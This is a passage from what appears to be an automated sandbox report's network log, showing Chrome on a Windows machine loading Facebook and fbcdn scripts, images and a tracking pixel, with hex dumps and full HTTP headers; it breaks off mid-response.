                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC2048INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 65 66 65 72 72 65 64 22 2c 5b 22 50 72 6f 6d 69 73 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3b 28 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 29 2e 72 65 73 6f 6c 76 65 28 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 61 3d 61 7c 7c 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 3b 74 68 69 73 2e 24 31 3d 21 31 3b 74 68 69 73 2e 24 32 3d 6e 65 77 20 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 2e 24 33 3d 61 2c 63 2e 24 34 3d 62 7d 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC29INData Raw: 65 74 75 72 6e 20 61 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b
                                                                                                                                                                                                                                  Data Ascii: eturn a}g["default"]=a}),98);


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  32192.168.2.649758157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC689OUTGET /security/hsts-pixel.gif HTTP/1.1
                                                                                                                                                                                                                                  Host: facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1715INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC54INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 2bGIF89a!,D;0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  33192.168.2.649760157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC654OUTGET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 02:00:53 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: UlPkWYsS18SYgXc6G9LoG4v5mIuPRr3pkH/2RcSd332QoKb28KeFNwPiZuURFxV5EOiQxlbSLWBI3o+9bjXUgA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 95
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC94INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 0a a0 33 31 78 00 00 00 0a 49 44 41 54 08 1d 63 60 00 00 00 02 00 01 cf c8 35 e5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR%VPLTEz=tRNS31xIDATc`5IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  34192.168.2.649759157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC654OUTGET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: QyE5Q1JQF3oDPNLRd40ogw==
                                                                                                                                                                                                                                  Expires: Wed, 17 Sep 2025 12:32:14 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: fgnvOh9p+qawOCt2d3iqeOe4L4GEohK3XAM47DmQW8iP49OMxfSMKojKeiru1+Dhld3egapyWlSDosykZq52Cg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3535
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC3534INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 38 08 03 00 00 00 b5 c4 f8 c6 00 00 02 91 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR8PLTEGpL


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  35192.168.2.649762157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC374OUTGET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 8rx6czt+CAsqvWjnRr01qQ==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: NqxNkaaPvHKjB5oK25PeK2OQMYrY62oYSje8P53AMK+34T915jE8z+6thYh++XGxiNYLCgkwrhII8zjcRfOh0Q==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49300
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 2c 5b 22 41 72 62 69 74 65 72 22 2c 22 67 75 69 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 61 72 62 69 74 65 72 24 22 2b 63 28 22 67 75 69 64 22 29 28 29 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 61 3d 7b 5f 67 65 74 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 74 68 69 73 2c 68 29 3f 74 68 69 73 5b 68 5d 3a 74 68 69 73 5b 68 5d 3d 6e 65 77 28 63 28 22 41 72 62 69 74 65 72 22 29 29 28 29 7d 2c 69 6e 66 6f 72 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 34 37 2c 63 2c 74 79 70 65 6f 66 20 63 29 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 31 3f 5b 69 2c 63 2c 22 2a 22 5d 3a 5b 63 2c 22 2a 22 5d 7d 2c 67 65 74 47 65 6e 64 65 72 56 61 72 69 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 62 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 42 49 54 4d 41 53 4b 5f 47 45 4e 44 45 52 7c 7c 67 28 30 2c 31 31 36 34 38 2c 61 2c 74 79 70 65 6f 66 20 61 29 3b 72 65 74 75 72 6e 5b 61 2c 22 2a 22 5d 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 49 6d 70 6c 22
                                                                                                                                                                                                                                  Data Ascii: 47,c,typeof c);return a===1?[i,c,"*"]:[c,"*"]},getGenderVariations:function(a){a&b("IntlVariations").BITMASK_GENDER||g(0,11648,a,typeof a);return[a,"*"]}};e.exports=a}),null);__d("IntlVariationResolver",["IntlVariationHoldout","IntlVariationResolverImpl"
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 62 3a 61 2e 73 65 72 69 61 6c 69 7a 65 72 29 3b 64 3d 63 2e 6c 65 6e 67 74 68 3e 30 3f 22 3f 22 3a 22 22 3b 62 3d 61 2e 66 72 61 67 6d 65 6e 74 21 3d 3d 22 22 3f 22 23 22 2b 61 2e 66 72 61 67 6d 65 6e 74 3a 22 22 3b 61 3d 61 2e 66 72 61 67 6d 65 6e 74 3d 3d 3d 22 22 26 26 61 2e 66 72 61 67 6d 65 6e 74 53 65 70 61 72 61 74 6f 72 3f 22 23 22 3a 22 22 3b 72 65 74 75 72 6e 22 22 2b 65 2b 66 2b 67 2b 68 2b 64 2b 63 2b 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 21 31 29 3b 69 66 28 21 64 26 26 28 65 7c 7c 75 28 61 29 29 29 7b 72 65 74 75 72 6e 28 64 3d 62 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 7d 72 65 74 75 72 6e 20 73 28 63 2c 66 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                  Data Ascii: =null?b:a.serializer);d=c.length>0?"?":"";b=a.fragment!==""?"#"+a.fragment:"";a=a.fragment===""&&a.fragmentSeparator?"#":"";return""+e+f+g+h+d+c+a+b}function z(a,b,c,d,e,f){e===void 0&&(e=!1);if(!d&&(e||u(a))){return(d=b)!=null?d:""}return s(c,f)}function
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC660INData Raw: 61 73 68 3b 72 65 74 75 72 6e 20 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 6e 75 6c 6c 26 26 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 3d 22 4e 4f 5f 49 4e 4c 49 4e 45 22 3f 6e 65 77 28 63 28 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 22 29 29 28 62 2c 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 2c 64 2c 65 29 3a 63 28 22 46 62 74 52 65 73 75 6c 74 22 29 2e 67 65 74 28 61 29 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 69 73 53 74 72 69 6e 67 4e 75 6c 6c 4f 72 45 6d 70 74 79 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63
                                                                                                                                                                                                                                  Data Ascii: ash;return c("FbtResultGK").inlineMode!=null&&c("FbtResultGK").inlineMode!=="NO_INLINE"?new(c("InlineFbtResult"))(b,c("FbtResultGK").inlineMode,d,e):c("FbtResult").get(a)}g["default"]=a}),98);__d("isStringNullOrEmpty",[],(function(a,b,c,d,e,f){"use stric


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  36192.168.2.649763157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC372OUTGET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
